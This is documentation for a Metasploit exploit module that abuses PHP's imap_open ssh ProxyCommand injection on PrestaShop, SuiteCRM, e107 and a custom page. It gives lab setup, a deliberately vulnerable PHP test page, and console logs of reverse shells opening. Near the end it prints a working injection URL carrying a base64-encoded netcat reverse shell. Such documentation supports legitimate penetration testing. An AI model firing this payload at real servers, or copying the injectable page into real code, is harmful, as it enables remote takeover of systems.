adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
748da0b764112eeeebbe45bc31ca034ca773f008
metasploit-gs/documentation/modules/exploit/linux/http/php_imap_open_rce.md
T

401 lines
14 KiB
Markdown
Raw Normal View History

Land #10987, add exploit for PHP imap_open function against various web apps
2018-11-27 16:44:51 -06:00
## Vulnerable Application
The [imap_open](http://php.net/manual/en/function.imap-open.php) function within php,
if called without the `/norsh` flag, will attempt to preauthenticate an IMAP session.
On Debian based systems, including Ubuntu, `rsh` is mapped to the ssh binary. Ssh's
`ProxyCommand` option can be passed from `imap_open` to execute arbitrary commands.
While many custom applications may use `imap_open`, it is reported that the following
applications are vulnerable:
* [prestashop](https://github.com/PrestaShop/PrestaShop/blob/0d53d6b58b951ac364ad44671cf1ae9bf7ab6aed/controllers/admin/AdminCustomerThreadsController.php#L1010)
* [SuiteCRM](https://github.com/salesagility/SuiteCRM/blob/153b2bae76097cdba9fc9c025bcd829a702b8687/modules/InboundEmail/EditView.php#L260)
* [e107 v2](https://github.com/e107inc/e107/blob/7570b7ce4e17c03e9759c90889db8e750d566e53/e107_handlers/pop_bounce_handler.php#L83)
Prestashop exploitation requires the admin URI, and administrator credentials.
SuiteCRM exploitation requires administrator credentials.
e107 v2 exploitation requires administrator credentials.
Additional applications were reported vulnerable, but exploits were not written. See [#10987](https://github.com/rapid7/metasploit-framework/pull/10987) for additional details.
### Prestashop 1.7.2.4 on Ubuntu 16.04
Mostly derived from [websiteforstudents.com](https://websiteforstudents.com/install-prestashop-on-ubuntu-17-04-17-10-with-apache2-mariadb-and-php/),
with a few tweeks for Ubuntu 16.04, and to install PHP's imap mod.
```
sudo apt install apache2
sudo sed -i "s/Options Indexes FollowSymLinks/Options FollowSymLinks/" /etc/apache2/apache2.conf
sudo systemctl stop apache2.service
sudo systemctl start apache2.service
sudo systemctl enable apache2.service
sudo apt-get install mariadb-server mariadb-client
sudo systemctl stop mysql.service
sudo systemctl start mysql.service
sudo systemctl enable mysql.service
sudo mysql_secure_installation
sudo systemctl restart mysql.service
sudo apt install php libapache2-mod-php php-common php-mbstring php-xmlrpc php-soap php-gd php-xml php-intl php-mysql php-cli php-mcrypt php-ldap php-zip php-curl php-imap
sudo phpenmod imap
sudo mysql -u root -p
```
Run the following database commands:
```
CREATE DATABASE prestashop;
CREATE USER 'prestashopuser'@'localhost' IDENTIFIED BY 'new_password_here';
GRANT ALL ON prestashop.* TO 'prestashopuser'@'localhost' IDENTIFIED BY 'user_password_here' WITH GRANT OPTION;
FLUSH PRIVILEGES;
EXIT;
```
```
cd /tmp && curl -O https://download.prestashop.com/download/releases/prestashop_1.7.2.4.zip
unzip prestashop_1.7.2.4.zip
sudo mkdir -p /var/www/html/prestashop
sudo unzip prestashop.zip -d /var/www/html/prestashop/
sudo chown -R www-data:www-data /var/www/html/prestashop/
sudo chmod -R 755 /var/www/html/prestashop/
sudo nano /etc/apache2/sites-available/prestashop.conf
```
Utilize the following configuration:
```
<VirtualHost *:80>
ServerAdmin admin@example.com
DocumentRoot /var/www/html/prestashop/
ServerName example.com
ServerAlias www.example.com
<Directory /var/www/html/prestashop/>
Options +FollowSymlinks
AllowOverride All
Require all granted
</Directory>
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
```
```
sudo a2ensite prestashop.conf
sudo a2enmod rewrite
sudo a2dissite 000-default
sudo systemctl restart apache2.service
```
Browse to the website, and install with default information.
```
sudo rm -rf /var/www/html/prestashop/install/
```
Now browse to `/admin`, and the first time you'll be redirected to the admin URI. If not, `sudo ls /var/www/html/prestashop/admin*`.
### SuiteCRM 7.8.23 on Ubuntu 16.04
Mostly derived from [vultr.com](https://www.vultr.com/docs/how-to-install-suitecrm-on-ubuntu-16-04) but adding php's zip and mbstring packages.
```
sudo apt-get install apache2 mariadb-server php7.0 php7.0-mysql php7.0-gd php7.0-curl php7.0-imap libapache2-mod-php7.0 php7.0-mcrypt php7.0-xml php7.0-json php7.0-mbstring php7.0-zip -y
sudo systemctl restart apache2
sudo phpenmod imap
sudo mysql_secure_installation
```
```
wget https://suitecrm.com/files/156/SuiteCRM-7.8/322/SuiteCRM-7.8.23.zip
unzip SuiteCRM-7.8.23.zip
sudo mv SuiteCRM-7.8.23 /var/www/html/suitecrm
sudo chown -R www-data:www-data /var/www/html/suitecrm
sudo chmod -R 777 /var/www/html/suitecrm
sudo nano /etc/apache2/sites-available/suitecrm.conf
```
Utilize the following configuration:
```
<VirtualHost *:80>
ServerAdmin admin@yourdomain.com
DocumentRoot /var/www/html/suitecrm/
ServerName yourdomain.com
ServerAlias www.yourdomain.com
<Directory /var/www/html/suitecrm/>
Options FollowSymLinks
AllowOverride All
</Directory>
ErrorLog /var/log/apache2/suitecrm-error_log
CustomLog /var/log/apache2/suitecrm-access_log common
</VirtualHost>
```
```
sudo a2ensite suitecrm
sudo a2dissite 000-default.conf
sudo systemctl restart apache2
sudo systemctl restart mysql
```
### e107 2.1.9 on Ubuntu 16.04
Mostly derived from [websiteforstudents.com](https://websiteforstudents.com/install-e107-cms-on-ubuntu-16-04-18-04-18-10-with-apache2-mariadb-and-php-7-2/),
however with php 7.0 instead of 7.2.
```
sudo apt install apache2 mariadb-server mariadb-client php7.0 libapache2-mod-php7.0 php7.0-common php7.0-mysql php7.0-gmp php7.0-curl php7.0-intl php7.0-mbstring php7.0-xmlrpc php7.0-gd php7.0-bcmath php7.0-xml php7.0-cli php7.0-zip php7.0-imap -y
sudo systemctl restart apache2.service
sudo systemctl stop mysql.service
sudo systemctl start mysql.service
sudo systemctl enable mysql.service
sudo mysql_secure_installation
sudo mysql -u root -p
```
Run the following database commands:
```
CREATE DATABASE e107;
CREATE USER 'e107user'@'localhost' IDENTIFIED BY 'new_password_here';
GRANT ALL ON e107.* TO 'e107user'@'localhost' IDENTIFIED BY 'new_password_here' WITH GRANT OPTION;
FLUSH PRIVILEGES;
EXIT;
```
```
cd /tmp
wget http://sourceforge.net/projects/e107/files/e107/e107%20v2.1.9/e107_2.1.9_full.zip
sudo unzip -d /var/www/html/e107 /tmp/e107_2.1.9_full.zip
sudo chown -R www-data:www-data /var/www/html/e107/
sudo chmod -R 755 /var/www/html/e107/
sudo nano /etc/apache2/sites-available/e107.conf
```
Utilize the following configuration:
```
<VirtualHost *:80>
ServerAdmin admin@example.com
DocumentRoot /var/www/html/e107
ServerName example.com
ServerAlias www.example.com
<Directory /var/www/html/e107/>
Options FollowSymlinks
AllowOverride All
Require all granted
</Directory>
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
<Directory /var/www/html/e107/>
RewriteEngine on
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule ^(.*) index.php [PT,L]
</Directory>
</VirtualHost>
```
```
sudo a2ensite e107.conf
sudo a2enmod rewrite
sudo a2dissite 000-default
sudo systemctl restart apache2.service
sudo systemctl restart mysql.server
sudo systemctl restart mysql.service
```
### Custom Page on Ubuntu 16.04
Make sure `php-imap` is installed and enabled. Create `imap.php` with the following content.
```
<html>
<body>
<p>imap_open example exploitation page. Use URL parameter 'server'. Ex http://1.1.1.1/imap.php?server=EXPLOITHERE</p>
<?php
$server = htmlspecialchars($_GET["server"]);
$mbox = @imap_open("{".$server.":143}INBOX",'username','password');
echo '<p>Received: '.$server.'</p>';
$errors = imap_errors();
if (is_array($errors)) {
$errors = array_unique($errors);
}
if (count($errors) && is_array($errors)) {
$str_errors = '';
foreach ($errors as $error) {
$str_errors .= $error . ', ';
}
$str_errors = rtrim(trim($str_errors), ',');
}
if (!$mbox) {
echo '<p>Errors: ' . ($str_errors);
}
?>
</body>
</html>
```
## Verification Steps
1. Install a vulnerable application
2. Start msfconsole
3. Do: ```use exploit/linux/http/php_imap_open_rce```
4. Do: ```set TARGETURI [URI]```
5. Do: ```set USERNAME [username]```
6. Do: ```set PASSWORD [password]```
7. Do: ```set target [target]```
8. Do: ```run```
9. You should get a shell.
## Options
**TARGETURI**
The URI for the target. This may change by target. Default is ` `.
Prestashop should be the admin URI, similar to `/admin2769gx8k3`.
## Scenarios
### PrestaShop 1.7.2.4 on Ubuntu 16.04.4 with PHP 7.0
```
resource (presta.rb)> use exploit/linux/http/php_imap_open_rce
resource (presta.rb)> set TARGETURI /admin2769gx8k3
TARGETURI => /admin2769gx8k3
resource (presta.rb)> set USERNAME ubuntu@none.com
USERNAME => ubuntu@none.com
resource (presta.rb)> set PASSWORD ubuntuubuntu
PASSWORD => ubuntuubuntu
resource (presta.rb)> set rhosts 1.1.1.1
rhosts => 1.1.1.1
resource (presta.rb)> set lhost 2.2.2.2
lhost => 2.2.2.2
resource (presta.rb)> set target 0
target => 0
resource (presta.rb)> set verbose true
verbose => true
resource (presta.rb)> exploit
[*] Started reverse TCP handler on 2.2.2.2:4444
[*] Redirected to http://1.1.1.1/admin2769gx8k3/
[*] Redirected to http://1.1.1.1/admin2769gx8k3/index.php?controller=AdminLogin&token=6dab1f7b4eea17d2b44a8929ead9df68
[*] Token: 6dab1f7b4eea17d2b44a8929ead9df68 and Login Redirect: http://1.1.1.1/admin2769gx8k3/&token=09283f9efc45fc75eca3b8d5f1b1f92f
[*] Logging in with ubuntu@none.com:ubuntuubuntu
[*] Login JSON Response: {"hasErrors":false,"redirect":"http:\/\/1.1.1.1\/admin2769gx8k3\/index.php?controller=AdminDashboard&token=e324e8b387afb1874947db9b1ba411c8"}
[+] Login Success, loading admin dashboard to pull tokens
[*] Customer Threads Token: ec653c8bfc09754fc63aaa94101911dc
[+] Sending Payload with Final Token: ec653c8bfc09754fc63aaa94101911dc
[*] IMAP server change left on server, manual revert required.
[*] Command shell session 1 opened (2.2.2.2:4444 -> 1.1.1.1:41964) at 2018-11-20 18:29:28 -0500
uname -a
Linux ubuntu1604 4.4.0-138-generic #164-Ubuntu SMP Tue Oct 2 17:16:02 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```
### SuiteCRM 7.8.23 on Ubuntu 16.04.4 with PHP 7.0
```
resource (suitecrm.rb)> use exploit/linux/http/php_imap_open_rce
resource (suitecrm.rb)> set target 1
target => 1
resource (suitecrm.rb)> set TARGETURI /
TARGETURI => /
resource (suitecrm.rb)> set USERNAME admin
USERNAME => admin
resource (suitecrm.rb)> set PASSWORD admin
PASSWORD => admin
resource (suitecrm.rb)> set rhosts 1.1.1.1
rhosts => 1.1.1.1
resource (suitecrm.rb)> set lhost 2.2.2.2
lhost => 2.2.2.2
resource (suitecrm.rb)> set verbose true
verbose => true
resource (suitecrm.rb)> exploit
[*] Started reverse TCP handler on 2.2.2.2:4444
[*] Loading login page
[*] Logging in as admin:admin
[+] Login Success
[*] Loading InboundEmail page
[+] Sending payload with group_id f047031d-1697-3d0d-bd39-5bf499e5470a
[*] IMAP server config left on server, manual removal required.
[*] Command shell session 1 opened (2.2.2.2:4444 -> 1.1.1.1:32806) at 2018-11-20 18:31:40 -0500
uname -a
Linux ubuntu1604 4.4.0-134-generic #160-Ubuntu SMP Wed Aug 15 14:58:00 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```
### e107 2.1.9 on Ubuntu 16.04.4 with PHP 7.0
```
resource (e107.rb)> use exploit/linux/http/php_imap_open_rce
resource (e107.rb)> set target 2
target => 2
resource (e107.rb)> set TARGETURI /
TARGETURI => /
resource (e107.rb)> set USERNAME admin
USERNAME => admin
resource (e107.rb)> set PASSWORD admin
PASSWORD => admin
resource (e107.rb)> set rhosts 1.1.1.1
rhosts => 1.1.1.1
resource (e107.rb)> set lhost 2.2.2.2
lhost => 2.2.2.2
resource (e107.rb)> set verbose true
verbose => true
resource (e107.rb)> exploit
[*] Started reverse TCP handler on 2.2.2.2:4444
[*] Logging in as admin:admin
[+] Login Success
[*] Checking if Cron is enabled for triggering
[+] Storing payload in mail settings
[*] Loading cron page to execute job manually
[+] Triggering manual run of mail bounce check cron to execute payload with cron id 3 and etoken 3b6aa8ca02dbd2bf8218874606c5e2f1
[*] IMAP server config left on server, manual removal required.
[*] Command shell session 1 opened (2.2.2.2:4444 -> 1.1.1.1:50742) at 2018-11-23 20:01:13 -0500
uname -a
Linux ubuntu1604 4.4.0-134-generic #160-Ubuntu SMP Wed Aug 15 14:58:00 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```
### Custom Page on Ubuntu 16.04
Using the `imap.php` page listed above.
```
msf5 > use exploit/linux/http/php_imap_open_rce
msf5 exploit(linux/http/php_imap_open_rce) > set target 3
target => 3
msf5 exploit(linux/http/php_imap_open_rce) > set lhost 1.1.1.1
lhost => 1.1.1.1
msf5 exploit(linux/http/php_imap_open_rce) > set rhost 2.2.2.2
rhost => 2.2.2.2
msf5 exploit(linux/http/php_imap_open_rce) > exploit
[*] Started reverse TCP handler on 1.1.1.1:4444
[*] Listener started for 300 seconds
[+] POST request connection string: x -oProxyCommand=`echo$IFS$()bWtmaWZvIC90bXAvaWVib3U7IG5jIDE5Mi4xNjguMi4xMTcgNDQ0NCAwPC90bXAvaWVib3UgfCAvYmluL3NoID4vdG1wL2llYm91IDI+JjE7IHJtIC90bXAvaWVib3U=|base64$IFS$()-d|bash`}
[+] GET request connection string: x%20-oProxyCommand=%60echo$IFS$()bWtmaWZvIC90bXAvaWVib3U7IG5jIDE5Mi4xNjguMi4xMTcgNDQ0NCAwPC90bXAvaWVib3UgfCAvYmluL3NoID4vdG1wL2llYm91IDI%2BJjE7IHJtIC90bXAvaWVib3U=%7Cbase64$IFS$()-d%7Cbash%60%7D
[*] Command shell session 1 opened (1.1.1.1:4444 -> 2.2.2.2:41124) at 2018-11-25 10:52:55 -0500
uname -a
Linux ubuntu1604 4.4.0-134-generic #160-Ubuntu SMP Wed Aug 15 14:58:00 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```
The GET request was utilized, and the final URL utilized was: `http://2.2.2.2/imap.php?server=x%20-oProxyCommand=%60echo$IFS$()bWtmaWZvIC90bXAvaWVib3U7IG5jIDE5Mi4xNjguMi4xMTcgNDQ0NCAwPC90bXAvaWVib3UgfCAvYmluL3NoID4vdG1wL2llYm91IDI%2BJjE7IHJtIC90bXAvaWVib3U=%7Cbase64$IFS$()-d%7Cbash%60%7D`
Reference in New Issue Copy Permalink